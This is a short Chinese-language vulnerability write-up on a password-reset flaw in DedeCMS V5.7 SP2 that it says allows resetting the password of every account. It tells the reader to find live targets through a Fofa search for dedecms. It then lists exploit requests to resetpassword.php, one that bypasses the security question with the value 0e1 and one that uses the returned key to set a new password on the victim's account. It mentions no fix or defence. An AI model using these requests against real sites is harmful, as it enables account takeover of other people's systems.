漏洞环境
Fofa搜dedecms
漏洞危害
重置系统的所有账号的密码
影响范围
DeDecms V5.7 SP2最新版本
漏洞复现
首先注册账号0000001/0000002
登录成功
通过登录抓包知道此账号对应的id号为16然后清除cookie退出浏览器,再次访问登录页面
构造请求包生成poc
/member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=16
根据poc构造重置密码的url
http://www.xxx.com/member/resetpassword.php?dopost=getpasswd&id=16&key=b8sJ1HN6
直接在这对目标账号修改个新密码就行了。